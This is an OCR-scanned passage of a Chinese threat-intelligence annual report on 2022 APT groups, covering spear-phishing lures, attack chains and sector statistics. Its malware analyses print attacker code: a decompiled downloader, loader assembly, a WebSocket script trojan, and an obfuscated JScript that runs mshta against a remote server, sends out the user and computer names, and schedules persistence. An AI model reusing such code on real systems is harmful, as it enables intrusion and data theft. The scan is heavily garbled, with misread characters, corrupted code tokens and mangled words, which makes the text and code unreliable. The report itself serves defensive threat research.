O 单 主 册 下 可 下 要 画 睛 。 为 了 帮助 保护 您 的 隐私 ，Outlook 禁止 自动 下 载 该 邮件 中 的 某 些 图片 。 


Z| 政策 分 析 资 料 .zip 
J 6 MB 


E 


您 好 ， 

为 了 传达 一 肚 醒 精神 ， 分 享 此 院 发 表 的 内 容 。 附 件 只 对 本 院 相 关 估 员 公 开 ， 太 家 请 不 要 外 传 。 
附件 密码 :china20 

谢谢 


Ez] 


Z| 1.18 邮件 截图 


整个 攻击 流程 如 下 : 
010011 N 
`, Z 解压 缩 后 Mps neck oneclick 触 发 ES 
>< 4— == Ey ^ 
的 外 邮件 达 XXX 精 神 .ppsx WPS codec install.Ink dubalnstall.vbe dubapack dat 
evteng.exe MurocApi.dll 
内 存 加 载 
未 知 后 门 cc 下 载 者 
Ed Ed 


1.19 执行 流程 


攻击 者 精心 制作 的 PPSX 诱饵 文件 内 容 如 下 : 


13 2022 年 


度 报告 


o 


NODESE-4 3:17 tis t, 


4. 美国 台湾 新 政策 法 对 亚太 国家 政策 带 来 的 影响 


一 一 一 一 - à : 


A. 图 1.20 PPSX 诱饵 内 容 


攻击 过 程 会 在 内 存 加 载 一 个 下 载 者 ， 并 从 C2 下 载 最 终 的 后 门 木 马 ， 遗 憾 的 是 我 们 没有 成 功 获取 到 最 后 的 
Payload。 


I + 2 V50 + 1) = V; 
v85 = HttpOpenRequestW(v78, L"POST", &szAgent, 0164, 0i64, 0i64, 0x800000u, 0164); 
v86 = v85; 
if ( !v85 ) 
return 0164; 
dwBufferLength[0] = 4; 
InternetQueryOptionW(v85, Ox1Fu, &Buffer, dwBufferLength); 
Buffer |» 0x13380u; 
InternetSetOptionW(v86, Oex1Fu, &Buffer, 4u); 


else 
if ( v30 ) 


v87 = 0164; 
do 
t 
v88 = 2 * v79; 
v89 = v87 & 7; 
+rv81; 
++v79; 
+tv87; 
*(( BYTE *)&szAgent + v88) = *( BYTE *)(v81 - 1) ^ byte 18001C470[v89]; 
*(( BYTE *)&szAgent + (unsigned int)(v88 + 1)) = 0; 


1 
while ( v79 < v80 ); 


H 
*(( BYTE *)&szAgent + 2 * v80) = €; 
*(( BYTE *)&szAgent + 2 * v80 + 1) = €; 
v86 = HttpOpenRequestW(v78, L"POST", &szAgent, 0i64, 0i64, 0i64, 0, 0i64); 
if ( !v86 ) 
return 0i64; 


*( OWORD *)String = xmmword 18001C3C0; 


v123 = xmmword 18001C3De; 
v124 = xmmword 18001C3E0; 
v125 = xmmword 18001C3Fe; 
v126 = xmmword 18001C400; 
v127 = xmmword 18001C410; 


mem set(( int64)v128, 0, 0x1A0ui64); 
vaa = l«trlenufGtrcincl- 


全 图 1.21 下 载 者 的 代码 截图 


奇 安信 威胁 情报 中 心 会 持续 监控 该 未 知 团伙 的 攻击 活动 。 


° o 
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APT-Q-22 


关键 词 : 鱼 叉 邮件 、 重 点 单位 
相 较 于 去 年 ，APT-Q-22 的 攻击 活动 频率 下 降 了 不 少 。 我 们 仅 观 察 到 攻击 者 制作 了 非常 精良 的 鱼 又 邮件 ， 
并 没有 观察 到 0day 漏洞 的 利用 。APT-Q-22 投递 的 钓鱼 邮件 如 下 : 


dapes i 
"T 
Q sss REGIE. 3STSHDEHDESSIM, Outook BILEN FRREEPRRESH, 


发 明 专利 申请 公布 号 


您 好 ， 本 公司 受 国家 知识 产权 局 之 委托 设计 并 建设 一 个 综合 数据 管理 平台 。 该 平台 在 本 月 初 通 过 了 升级 ， 请 您 确定 以 下 专利 申请 人 的 个 人 信息 是 否 正确 ， 


网 


1.22 邮件 截 医 


诱导 受害 者 点 击 链接 下 载 第 一 阶段 Payload， 最 终 调用 Mshta 执 行 远程 服务 器 上 的 脚本 文件 ， 并 等 待 木 
马 的 下 发 。 


1| «script? 

| var objUserInfo = new ActiveXObject("WScript.network"): 

3 var uname = objUserInfo. UserName; 

4 var strCompName = objUserInfo. computername 

5 ao-new ActiveXObject ("W' e" S"&"cr"*"ip'*"t. "e" Sh"*"e"4"1"-"1"); 

6 ao. run(" nshta http:// 9 [^ LEN *strCompName*uname, 0); 

7 ao.run(' schtasks.exe /create /sc ninute /no 3 /tn 3& WV & /tr "mshta bib ef cox? WON Ver=hta2”’ ,0) ;window. close () ; 
8| </script> 


网 


1.23 远程 服务 器 上 的 脚本 代码 截 


x 


等 待 一 段 时 间 后 下 发 了 一 个 由 .NET 编 写 的 Loader， 主 要 功能 是 执行 PowerShell 命 令 。 


网 


1.24 免 杀 Loader & 


四 


15 2022 年 度 报 告 


接着 从 远程 服务 器 下 载 Payload 并 执行 ， 经 过 分 析 Payload 为 poshc2_DLL。 


& github.com/nettitude/PoshC2 Shellcode 


DB README.md Updated for new blog post 5 months ago 


README.md 


PoshC2 DLLS 


AMSI Bypass & ETW Bypass included in Sharpv2 and Sharpv4 Shellcode 


e https;//github.com/rasta-mouse/AmsiScanBufferBypass 


e https;//blog.xpnsec.com/hiding-your-dotnet-etw/ 


Posh uses sRDI and Binary Patching 


Z| 1.25 开源 dll 组 件 截 


网 


两 层 内 存 加 载 执行 最 终 的 Payload， 之 后 会 尝试 使 用 PowerUp、SMBExec 等 插件 进行 横向 移动 ， 但 该 攻 
击 手法 已 经 被 奇 安信 天 擎 终端 安全 软件 实时 拦截 。 


IRI 


1.26 最 终 后 门 截 


网 
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VID APT-Q-45 


关键 词 : 鱼 叉 邮件 、 重 点 单位 在 海外 的 资产 
2022 年 初 ， 我 们 基于 奇 安 信 天 警 EDR 数据 发 现 了 一 个 从 未 披露 过 的 团伙 针对 “中 巴 经 济 走廊 ”项 目 国 
内 承包 商 在 巴基斯坦 的 资产 进行 攻击 ， 通 过 鱼 叉 邮 件 投递 诸如 名 为 “certificate-ntdc.zip” 的 附件 ， 执 
行 成 功 后 会 在 Program Data 目录 下 释放 McAfee 白 利 用 组 件 ， 通 过 读 取 文件 的 方式 内 存 加 载 Cobalt 


Strike 远 控 木 马 。 

.text:1000100D mov [ebp+var 4|, eax 
.text:10001010 push ebx 

.text:10001011 push esi 

.text:10001012 push edi 

.text:10001013 push offset Mode s "p" 
.text:10001018 lea eax, [ebp*Stream] 
.text:1000101B mov [ebp*Stream], e 
.text:10001022 push offset FileName ; "sysctl.sys" 
.text:10001027 push eax ; Stream 
.text:10001028 call ds:fopen s 

.text:1000102E mov eax, [ebp*Stream] 
.text:10001031 add esp, @Ch 

.text:10001034 test eax, eax 

.text:10001036 jz loc 10001139 

.text:1000103C mov esi, ds:fseek 
.text:10001042 push 2 ; Origin 
.text:10001044 push e ; Offset 
.text:10001046 push eax ; Stream 
.text:10001047 call esi ; fseek 

.text:10001049 push [ebp*Stream] ; Stream 
.text:1000104C call ds:ftell 

.text:10001052 push e ; Origin 
.text:10001054 push e ; Offset 
.text:10001056 push [ebp*Stream] ; Stream 
.text:10001059 mov dwSize, eax 

.text:1000105E call esi ; fseek 

.text:10001060 add esp, 1Ch 

.text:10001063 push 4 ; flProtect 
.text:10001065 push 3000h ; flAllocationType 
.text:1000106A push dwSize ; dwSize 
.text:10001070 push e ; lpAddress 
.text:10001072 call ds:VirtualAlloc 
.text:10001078 xor esi, esi 

.text:1000107A mov ebx, eax 

.text:1000107C xor edi, edi 

.text:1000107E mov lpstartAddress, ebx 


A 图 1.27 Loader 读 取 文件 逻辑 截 


网 


接着 攻击 者 释放 了 一 个 带 有 签名 的 插件 ， 我 们 认为 APT-Q-45 入 侵 了 国内 某 工程 建设 行业 的 软件 开发 公 


司 ， 窃 取 了 该 公司 的 数字 签名 。 
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全 球 高 级 持续 性 威胁 (APT) 


2022 4 


FERS 


«(9 奇 安信 威胁 情报 中 心 


Wi chr.exe Ett 
数字 签名 详细 信息 ? x 
=m ”高 级 
=> ”数字 签名 信息 
此 数字 签名 正常 。 

签名 者 信息 (S) 

m arem eum n 

电子 邮件 : 不 可 用 

签名 时 间 : [20219522A 19:55:55 

|o ABM 


A. 图 1.28 正规 数字 签名 截 


网 


插件 为 7zip 打 包 而 成 的 可 执行 文件 ， 运 行 后 会 释放 恶意 的 JS 脚本 并 执行 ， 脚 本 内 容 为 轻 量 化 脚本 木马 。 


124 function initialize() (+, 
125| > (websocket = new WebSocket(" — 5 < s :8008")).onopen = function (e) {},} 
126 > websocket.onmessage = async function (e) (+ 
127|> 3 last live connection timestamp = get unix timestamp(;/ 
128 > = try 
129 > 3 + var t = JSON.parse(e.data)} 
130 > > ) catch (e) (+ 
131 > ` 3 return console.error("Could not parse WebSocket message!"),. 
132| > 3 3 void console.error(e)4 
1335 > W 
134 > 3 if (action in RPC CALL TABLE) {4 
135| > 3 3 const e = await RPC CALL TABLE[t.action](t.data);. 
136 > > 3 websocket.send(/SON.stringify((.. 
137 > 3 3 3 E id: tid,y 
138 > * > 3 3 origin action: t.action,} 
139 > + + > + result: ei 
140 > 3 3 3 Dy 
141| > 3 ) else. 
142| > 3 3 console.error('No RPC action $(t.action)!). 
A. 图 1.29 脚本 木马 截图 


通过 奇 安 信 大 网 数据 遥测 显示 APT-Q-45 似 乎 只 对 巴基斯坦 政府 和 中 国 重点 企业 单位 在 巴基斯坦 的 基础 设 
施 感 兴趣 ， 在 国内 并 没有 发 现 受害 者 。 从 安全 建设 的 角度 ， 该 组 织 的 发 现 给 我 们 敲 响 了 和 警钟， 随 着 “一 
带 一 路 ”和 “中 巴 经 济 走廊 ”的 推进 ， 越 来 越 多 的 本 土 企 业 走 出 国门 ， 如 何 保障 这 些 企业 在 海外 的 网 络 
基础 设施 的 安全 是 未 来 需要 考虑 的 问题 。 
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摩 耶 象 (APT-Q-41) 


关键 词 : 钓鱼 邮件 、 安 卓 端 、 外 包 
摩 耶 象 (APT-Q-41) 在 2022 年 疯狂 针对 我 国 军工 、 政 府 、 外 交 等 行业 投递 钓鱼 邮件 ,相关 邮件 内 容 如 下 : 


2022/11/7 (周一 ) 17:57 


1 ei ig i i > 
Fwd: 


KFA Amm moo (m OU; mas ma 


m- Final programe.pdf z 
dul 74KB 


Dear Sir, 
Please find the attached final Prog. 


Best Regards 


A. 图 1.30 钓鱼 邮件 截图 


附件 PDF 内 容 如 下 : 
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Most Immediate 
MODP/PC-1 


Ministry of Defence Production 
Pak Sectt-11, Rawalpindi 


07 November 2022. 


Itr no 7/3/2021/DP-15 
Progr; final & Approved by MoDP for IDEA 22 


The attached letter is forwarded for your information and necessary action, please. 
Take action accdly and cfm, pl. 
Kind Regards 


ajor 
(Dawood Saleem Chaudhry) 
Communication Officer 


Confidentiality: This file is intended solely for the individual or entity to whom it is addressed. 
The information contained in this secure file is legally privileged and confidential. 


Download PDF 


SECRET 


A 图 1.31 PDF 诱饵 内 容 


点 击 PDF 文件 中 的 链接 后 会 跳 转 到 钓鱼 页 面 。 根 据 我 们 的 监测 追踪 ，APT-Q-41 在 2022 年 中 成 功 钓 取 


了 巴基斯坦 国防 采购 总 局 的 邮箱 。 


邮箱 : ti_support@qianxin.com ”电话 : 95015 BW: https://ti.qianxin.com 
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€ > © ( à mai.dgdp.gov.pk/1 
Contacts Calendar Tasks Briefcase Preferences 
Reply || Repiy toan || Forward | | Archive || Delete || Spam > || €] | Actions >| 
Y Mail Folders Sorted by Date T 30 conversations 
| m To view a conversation, click on it. 
3, Inbox () T | e Habib Dec21 
B Sent P s - == Ji a m = er 
Bg Drafts 
€ b Sajjad Ahmed Qazi - Ê Dec 21 
E Junk B 
c DRESSES = DR ° :@ P 
W Trash 
© hussain aklhaq Dec 19 
Searches - 
Le - PN 
Tags 
F Zimlets s coh De 
dandi > 
T Archive e 
Q WebEx © Content-filter Dec 13 
YV Yahoo! Emoticons — 0 M a i — ponens, hs 
€ Muhammad Amjad Butt. Dec 09 
c "2 ws 2r 
@ Muhammad Chanzaib Nov11 
— uer 
© Malik Safdar Nov 11 
m z o” 
® MoDP-PC-1 Nov 07 
E er 
—— 、 
全 图 1.32 成 功 登 录 后 的 截图 


除 此 之 外 ， 我 们 还 发 现 了 该 团伙 设计 的 另 一 类 钓鱼 页 面 ， 诱 导 受 害 者 下 载 Windows 或 者 Android 平 台 的 
木马 文件 并 执行 。 


-ri umi dada ru wir 
rat runpssrHa COS K Runa 


HOME | LEADERSHIP | MINISTRY | DEFENSE POLICY | CMC DEPARTMENT Select Language: v English == 


You have requested the file: MOD Official Software for Embassy Officials in 
China 


Name: MOD CHINA | DOWNLOAD NOW A) | 


Size: 4.13 MB i J 


Uploaded: 03-07-2022 09:06:45 
Hrs 

Last download: 24-07-2022 
11:46:20 Hrs 


1.33 新 型 钓鱼 页 面 截 


网 


» 
四 


经 过 分 析 ，Android 平 台 的 恶意 软件 为 SpyNote，Windows 平 台 的 恶意 软件 家 族 为 Neshta， 其 运行 后 会 
通过 内 存 加 载 执 行 LodaRAT 远 控 木 马 。 鉴 于 这 两 个 流行 的 恶意 软件 家 族 在 全 球 网 络 攻击 中 非常 活跃 ， 我 
们 认为 以 上 木马 是 APT-Q-41 寻 找 的 外 包 人 员 制 作 ， 均 不 能 免 杀 。 
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APT-Q-77 


关键 词 : 重点 单位 在 海外 资产 、 能 源 、0day/Nday、 供 应 链 、 政 府 、 军 工 

2022 年 未 ， 奇 安信 威胁 情报 中 心 发 现 了 一 个 之 前 从 未 见 过 的 渗透 攻击 团伙 ， 该 团伙 攻击 活动 非常 频繁 。 
在 短 短 三 个 月 内 ， 我 们 就 捕获 到 了 其 使 用 的 0day 漏洞 一 个 、 新 型 特种 木马 四 种 、Loader (加 载 器 ) 
六 种 。 另 外 在 本 轮 攻击 活动 中 出 现 了 我 国 重点 能 源 单 位 在 中 亚 的 网 络 资产 ， 通 过 C2 上 仿冒 的 站 点 内 容 
推测 该 团伙 的 攻击 范围 在 东亚 和 欧洲 ， 故 我 们 有 一 定 的 信心 认为 该 团伙 疑似 为 奇 安信 内 部 命名 编号 为 
APT-Q-77 的 组 织 。 


通过 观察 和 分 析 APT-Q-77 对 某 终端 管理 软件 Oday 漏洞 利用 的 技术 细节 ， 我 们 认为 APT-Q-77 可 能 在 五 
年 前 就 已 经 掌握 该 0day 漏洞 ， 但 每 次 使 用 该 漏洞 进行 攻击 的 时 间 都 非常 短 。 与 以 往 善 于 渗透 的 APT 组 
织 不 同 ，APT-Q-77 在 通过 0day 漏洞 下 发 木马 后 仅 三 天 就 进行 了 自 删 除 操作 ， 攻 击 节奏 很 快 。 同 时 该 组 
织 的 编码 能 力也 非常 强 ， 在 针对 特定 用 户 时 除了 使 用 Cobalt Strike 木马 以 外 ， 还 使 用 了 一 个 之 前 从 未 
披露 过 的 ， 基 于 rust 语言 编写 的 特种 木马 。 


奇 安信 威胁 情报 中 心 将 持续 对 APT-Q-77 进行 跟踪 监控 。 


三 、2022 年 境内 受害 行业 分 析 


进一步 通过 奇 安信 威胁 雷达 的 遥测 感知 和 奇 安信 红 雨 滴 团 队 基 于 客户 现场 的 APT 攻击 线索 ， 并 结合 使 用 
了 奇 安信 威胁 情报 的 全 线 产品 告警 数据 进行 分 析 : 2022 年 涉及 我 国政 府 、 金 融 商 贸 、 高 新 科技 企业 的 
高 级 威胁 事件 占 主 要 部 分 ， 其 次 为 能 源 、 卫 生 医 疗 、 国 防 军事 等 领域 。 相 关 受 影响 的 境内 行业 分 布 如 下 。 


2022 年 高 级 威胁 事件 涉及 境内 行业 分 布 <> =ë 


制造 4% ”其 他 3% 


全 图 1.34 2022 年 高 级 威胁 事件 涉及 境内 行业 分 布 情况 
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基于 上 述 数 据 分 析 ， 针 对 我 国境 内 攻击 的 APT 组 织 活跃 度 排 名 及 其 关注 的 行业 领域 如 下 表 。 


组 织 名 称 涉及 行业 
TOP1 APT-Q-27 博彩 、 诈 驴 
TOP2 APT-Q-31 ( 8218, ) 政府 、 科 研 、 海 事 机 构 
TOP3 APT-Q-20 ( #z Bë ) 国防 、 政 府 、 科 技 、 教 育 
TOP4 APT-Q-22 重点 单位 
TOP5 APT-Q-37 ( ERTE ) 政府 、 电 力 和 工业 相关 
TOP6 APT-Q-1 (Lazarus) 政府 、 金 融 、 军 事 
TOPY APT-Q-29 (Winnti) 互联 网 产业 、 人 金融、 科技 
TOP8 APT-Q-36 ( Eis & ) 政府 、 军 事 、 科 研 、 教 育 
TOP9 APT-Q-77 (APT29) BEEN BUM. EI 
TOP10 APT-Q-2 (Kimsuky) 政府 、 媒 体 、 军 事 、 金 融 
TOP11 APT-Q-40 (Confucius) 政府 、 军 事 
TOP12 APT-Q-39 ( 响尾蛇 ) 政府 、 军 事 


A 表 1.34 活跃 组 织 排名 及 针对 的 目标 行业 
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第 二 章 全 球 高 级 持续 性 威胁 综述 


公开 来 源 的 APT 情报 (以 下 简称 “开源 情报 ”) 分 析 是 了 解 全 球 网 络 安全 研究 机 构 安全 关注 ， 认 知 全 球 
高 级 持续 性 威胁 发 展 趋势 的 重要 手段 之 一 。2022 年 ， 奇 安信 威胁 情报 中 心 对 全 球 200 多 个 主要 的 APT 
类 情报 来 源 进 行 了 持续 监测 ， 监 测 内 容 包括 但 不 限于 APT 攻击 组 织 报告 、APT 攻击 行动 报告 、 疑 似 APT 
的 定向 攻击 事件 、APT 攻击 相关 的 恶意 代码 和 漏 润 分析， 以 及 我 们 认为 需要 关注 的 网 络 犯罪 组 织 及 其 相 
关 活 动 。 


本 章 内 容 及 结论 主要 基于 对 上 述 开 源 情报 以 及 内 部 威胁 雷达 数据 的 整理 与 分 析 。 


一 、 全 球 高 级 威胁 研究 情况 


奇 安信 威胁 情报 中 心 在 2022 年 监测 到 的 高 级 持续 性 威胁 相关 公开 报告 总 共 331 篇 。 各 月 监测 数据 如 下 
图 所 示 。 


Pm š © = 
2022 年 全 球 公开 的 高 级 威胁 报告 数量 月 度 统计 OPER 
40 
34 
32 
31 ia 29 30 
25 
23 
20 22 
| | 17 
Jan Feb Mar Apr May Jun dul Aug Sep Oct Noc Dec 


Z| 2.12022 年 全 球 公开 的 高 级 威胁 报告 数量 月 度 统计 
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二 、 受 害 目标 的 行业 与 地 域 


2022 年 初 ， 俄 马 冲 突 爆 发 ， 战 火 延 伸 至 网 络 空间 ， 受 此 影响 网 络 攻 击发 生 巨大 变化 。 通 过 开源 情报 数 
据 显 示 : 在 全 球 2022 年 披露 的 APT 相关 活动 报告 中 ， 涉 及 政府 (包括 外 交 、 政 党 、 选 举 相 关 ) 的 攻击 
事件 占 比 为 33%， 其 次 国防 军事 相关 事件 占 比 为 14%， 较 2021 年 增长 了 6%。 此 外 ， 科 技 相关 的 事件 
占 比 为 12%; 涉及 金融 商贸 以 及 能 源 行业 的 占 比 均 为 8%， 其 中 能 源 行业 占 比 是 2021 年 的 2 倍 。 


2022 年 高 级 威胁 事件 涉及 行业 分 布 情况 如 下 图 所 示 。 


2022 年 高 级 威胁 事件 涉及 行业 分 布 情况 (eS 
制造 3% 通信 3% 
教育 4% | 


医疗 健保 5 。 


新 闻 媒体 en A 
金融 商贸 8% A 
国防 军事 
能 源 8% 14% 


全 图 2.22022 年 全 球 高 级 威胁 事件 涉及 行业 分 布 


高 级 威胁 活动 涉及 目标 的 国家 和 地 域 分 布 情况 统计 如 下 图 (摘录 自 公 开 报 告 中 提 到 的 受害 目标 所 属国 家 
或 地 域 ) ， 可 以 看 到 高 级 威胁 攻击 活动 主要 集中 在 东欧 、 南 亚 、 东 亚 的 几 个 国家 和 地 区 。 
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«(9€ 奇 安信 威胁 情报 中 心 


A. 图 2.3 2022 年 公开 披露 的 高 级 威胁 活动 针对 的 国家 和 地 区 


三 、 活 跃 高 级 威胁 组 织 情况 


本 次 报告 对 开源 情报 中 所 提 及 的 所 有 APT 组 织 及 相关 行动 进行 了 分 析 和 整理 。 其 中 ， 提 及 率 最 高 的 5 个 


APT 组 织 分 别 是 : Lazarus 8.7%, Kimsuky 5.0%， 透 明 部 落 4.5%, Gamaredon 3.6%， 海 莲花 3.3%。 
另外 ，Lazarus、Kimsuky、 海 莲花 三 个 组 织 同样 位 列 2021 年 公开 报告 提 及 率 Top 5 列表 内 。 
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2022 年 公开 报告 披露 的 高 级 威胁 组 织 活 跃 情况 《fs > 奇 安信 


Lazarus 


Kimsuky 


透明 部 落 


Gamaredon 


海 莲花 


N : 
— : o: 
Cras. 

s: 


0% 1% 2% 3% 4% 5% 6% 7% 8% 9% 10% 


š] 2.4 2022 年 全 球 活跃 高 级 威胁 组 织 


进一步 对 公开 报告 中 高 级 威胁 活动 中 命名 的 攻击 行动 名 称 、 攻 击 者 名 称 ， 并 对 同一 背景 来 源 进 行 归 类 处 
理 后 的 统计 情况 如 下 ， 总 共 涉及 137 个 命名 的 威胁 来 源 ， 较 2021 年 数量 有 所 增长 。 


» 
JR 
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š] 2.5 2022 年 公 玫 


Wer o 
^D Castling 
REvil 


Gamaredon 


F 披 露 的 高 级 威胁 类 攻击 组 织 和 行动 


全 球 高 级 持续 性 威胁 (APT) 2022 FERS 


<C 奇 安信 威胁 情报 中 心 
四 、 高 级 威胁 年 度 活动 特点 


(—) 受 经 济 利益 驱使 ,针对 金融 行业 的 攻击 加 剧 


在 新 冠 疫情 和 俄 乌 冲 突 的 双重 冲击 之 下 ， 经 济 形 势 受 影响 ，2022 发 生 了 多 起 针对 金融 行业 的 攻击 活动 。 
除了 传统 金融 机 构 以 外 ，APT 组 织 还 通过 窍 取 加 密 货币 获取 经 济 利益 ， 甚 至 有 些 APT 组 织 将 目标 锁定 在 


博彩 行业 。 


据 公 开 报 告 披露 ，Lazarus 组 织 多 次 盯 上 加 密 货币 公司 ， 同 时 其 目标 也 包括 区 块 和 链 、 投 资 公司 等 金融 
机 构 。3 月 ，google 研 究 人 员 发 现 Lazarus 组 织 利 用 CVE-2022-0609 远 程 代码 执行 漏洞 开展 Operation 
Dream Job 和 Operation AppleJeus 活 动 ， 其 中 Operation AppleJeus 活 动 针 对 加 密 货币 和 金融 科技 行业 
的 目标 用 户 ， 受 害 者 数量 超过 85 名 。 


Bluenoroff group 被 认为 是 Lazarus 组 织 的 分 支 。2022 年 1 月 ， 卡 巴 斯 基 披露 该 组 织 针对 与 加 密 货币 及 智 
能 合约 、DeFi、 区 块 链 和 金融 科技 行业 有 关 的 各 种 公司 ， 受 害 者 来 自 俄罗斯 、 波 兰 、 斯 洛 文 尼 亚 、 乌 克 
兰 、 捷 克 共 和 国 、 中 国 、 印 度 、 美 国 、 新 加 坡 、 阿 联 酋 和 越南 。 


Kimsuky 组 织 在 2022 年 上 半年 也 被 披露 使 用 包含 加 密 货币 信息 的 Word 文 档 作 为 诱饵 ， 针 对 加 密 货币 公 
司 发 起 攻击 。 


除了 加 密 货 币 ， 国 外 安全 厂商 还 披露 了 一 个 从 拉丁 美洲 地 区 的 金融 企业 中 窃取 资金 的 组 织 ， 并 将 其 称 为 
"Elephant Beetle” 或 T762003。 该 团伙 通过 在 常规 活动 中 进行 隐藏 的 欺 话 交易， 最 终 窃取 了 数 百 万 美 
元 。 

此 外 ， 我 们 在 《Operation Dragon Breath (APT-Q-27) : 针对 博彩 行业 的 降 维 打击 》23 一 文中 披露 了 


金 眼 狗 团伙 所 在 的 Miuuti Group 组 织 针 对 博彩 、 金 融 行 业 的 定向 攻击 活动 ， 其 通过 “ 黑 吃 黑 ” 的 方式 将 
赌资 转移 到 自己 的 钱包 中 ， 实 现 财 富 自 由 。 


针对 国防 军事 和 能 源 行业 的 攻击 较 去 年 增多 


在 俄 马 冲 突 的 大 背景 下 ， 不 仅 东 欧 地 区 针对 国防 军事 目标 的 攻击 活动 激增 ， 南 亚 、 中 东 等 地 区 以 国防 军 


东欧 方向 的 相关 攻击 组 织 包 括 Turla、Gamaredon、APT28、LOREC53 等 ， 攻 击 者 除了 瞄准 乌克兰 的 军 
事 目标 ， 同 时 也 针对 其 他 西方 国家 目标 ， 比 如 美国 国防 承包 商 、 波 罗 的 海 国防 学 院 等 。 
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南亚 地 区 老牌 APT 组 织 摩 订 草 、 肚 脑 虫 、Sidewinder、C-Major、 葛 灵 花 均 被 多 次 披露 向 国防 军事 目标 
发 起 攻击 。 我 们 新 发 现 一 个 疑似 具有 南亚 背景 的 组 织 一 一 金刚 象 (VajraEleph) ， 专 注 于 对 军 方 目标 展 
开间 谍 情 报 活动 ， 已 经 观察 到 的 受害 人 员 主 要 为 巴基斯坦 国家 的 边防 军 (FC) 和 特种 部 队 (SSG) , £ 
其 是 伟 路 支 省 边防 军 (FCBLN) ， 此 外 还 包含 少量 的 联邦 调查 局 (FA 和 和 警察 (Police) 。 


友 商 披露 的 穆 伦 誉 组 织 多 次 针对 土耳其 海军 进行 钓鱼 攻击 ， 攻 击 目标 延伸 至 潜艇 科研 人 员 以 及 相关 军 
工 项 目 。 公 开 情 报 披露 的 攻击 国防 军事 目标 的 组 织 还 包括 MuddyWater、TunnelVision、 双 尾 蝎 以 及 
Lazarus 组 织 ， 相 关 攻 击 事件 累计 超 30 起 。 


此 外 ， 针 对 能 源 行业 的 APT 攻 击 活动 也 较 去 年 有 所 增加 。 在 俄 马 冲 突 中 出 现 了 对 能 源 关 键 基础 设施 的 网 
络 攻击 ，Sandworm 组 织 策 划 了 向 乌克兰 某 电力 能 源 供应 商 的 网 络 中 投递 工控 类 恶意 软件 Industroyer2 
和 多 种 数据 擦 除 型 恶意 软件 ， 若 攻击 成 功 实 施 ， 将 摧毁 乌克兰 多 个 变电站 和 电网 ， 影 响 范 围 约 为 200 万 
人 。 


除了 冲突 背景 下 的 破坏 性 攻击 ，APT 组 织 对 能 源 行业 的 攻击 意图 还 集中 在 机 密 数 据 窃取 。Lazarus 组 织 对 
全 球 多 国 能 源 供应 商 的 网 络 进行 渗透 ， 并 建立 长 期 访问 。 我 们 在 日 常 排 查处 置 攻 击 事件 时 也 发 现 ， 境 外 
APT 组 织 对 我 国 重 点 能 源 单位 在 海外 的 资产 发 动 了 攻击 。 


漏洞 依然 是 突 防 利用 阶段 主要 的 攻击 方式 


0day 及 Nday 漏 洞 已 成 为 APT 组 织 青睐 的 攻击 武器 。 据 Google Project Zero 统 计 ，2022 年 们 有 三 十 余 个 
针对 主流 软件 产品 的 0day 漏 洞 被 在 野 利 用 。 这 些 漏洞 利用 中 呈现 出 一 个 特点 ， 就 是 不 少 漏洞 来 自 于 针对 
先前 漏洞 的 修补 机 制 不 完善 ， 因 此 这 些 漏 洞 和 某 些 老 漏洞 很 相似 。 


Nday 漏 洞 在 APT 攻 击 活动 中 也 占有 一 席 之 地 ， 盛 其 是 那些 影响 范围 广 的 漏洞 。2022 年 最 炙手可热 的 漏 
洞 非 Log4j 漏 洞 (CVE-2021-44228) 莫 属 ， 由 于 该 漏洞 涉及 的 软件 产品 众多 ， 使 得 不 少 组 织 机 构 没 能 充分 
地 对 该 漏洞 相关 产品 进行 修补 ， 因 此 在 2022 年 全 球 多 个 APT 组 织 的 攻击 活动 中 都 出 现 了 它 的 身影 。 


主流 软件 的 0day 漏 洞 值得 重视 ， 但 某 些 本 土 软件 的 漏洞 也 不 可 小 遍 。 在 2022 年 境外 APT 组 织 针 对 我 国 的 
攻击 活动 中 ， 奇 安信 威胁 情报 中 心 独 家 捕获 6 个 针对 国产 软件 的 在 野 0day 漏 洞 ， 也 是 2022 年 国内 唯一 一 
家 捕获 境外 APT 组 织 针对 国内 目标 使 用 0day 漏 洞 的 安全 厂商 。 受 影响 厂商 已 知晓 相关 漏洞 并 进行 了 修 
补 。 
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《2》 奇 安信 威胁 情报 中 心 


鱼 又 邮件 仍然 是 最 主要 的 载荷 投递 方式 


鱼 叉 邮 件 在 2022 年 的 APT 攻 击 活动 中 仍 是 一 个 高 频 出 现 的 攻击 手段 。 比 如 ， 俄 乌 冲突 期 间 ， 多 个 东欧 
APT 组 织 利 用 鱼 叉 邮件 投递 恶意 软件 以 窃取 情报 。 攻 击 者 常 通过 邮件 中 的 钓鱼 链接 或 者 附件 ， 进 行 账号 
窃取 、 木 马 植 入 等 操作 。 为 了 对 抗 安全 防护 软件 对 邮件 及 邮件 附件 的 恶意 性 检测 ， 攻 击 者 也 不 断 党 试 新 
的 手法 ， 比 如 借助 虚拟 磁盘 格式 的 文件 打包 恶意 文件 ， 甚 至 在 邮件 中 内 入 恶意 代码 以 利用 邮件 系统 的 漏 
洞 ， 从 而 在 受害 者 不 知情 的 情况 下 盗 走 邮箱 登录 凭据 。 


Lnk 快捷 方式 文件 被 大 量 用 于 部 署 攻击 载荷 


Windows 快 捷 方式 (LNK 文 件 ) 是 一 种 用 户 界 面 中 的 句柄 ， 常 用 于 指向 其 他 文件 ， 还 可 以 额外 指定 命令 
行 参数 ， 从 而 在 运行 它 时 将 所 定 参 数 传递 到 目标 程序 。 基 于 LNK 文 件 的 特性 ，Windows 快 捷 方 式 可 充当 
部 署 恶 意 软 件 或 建立 持久 化 的 媒介 。 


在 攻击 初始 阶段 ， 攻 击 者 常 将 LNK 文 件 用 于 部 署 或 执行 攻击 载荷 ， 这 些 快 捷 方 式 通常 链接 至 系统 自 带 的 
合法 的 可 执行 文件 (LOLbins) ， 例 如 powershell.exe、mshta.exe 和 常见 的 cmd.exe 等 ， 从 而 绕 过 检 


测 ， 实 现代 码 执行 。 


根据 统计 数据 ，2022 年 度 有 多 个 APT 组 织 使 用 LNK 文 件 分 发 恶意 软件 ， 包 括 Gamaredon、Evilnum、 
Lazarus、InvisiMole、Darkhotel、APT29、APT37、SideWinder、SideCopy 等 。 


此 外 ，LNK 文 件 还 被 大 量 用 于 分 发 主流 恶意 软件 家 族 QBot、Emotet、lcedID 和 Bumblebee。 这 些 恶 意 
软件 家 族 能 够 在 受 感 染 的 系统 上 部 署 其 他 恶意 软件 ， 包 括 破坏 性 勒索 软件 。 


WD 遭受 攻击 的 目标 平台 趋 于 多 元 化 
Windows 作 为 在 PC 端 应 用 最 广泛 的 操作 系统 ， 一 直 以 来 都 是 黑客 团伙 攻击 的 主要 目标 平台 。 而 通过 
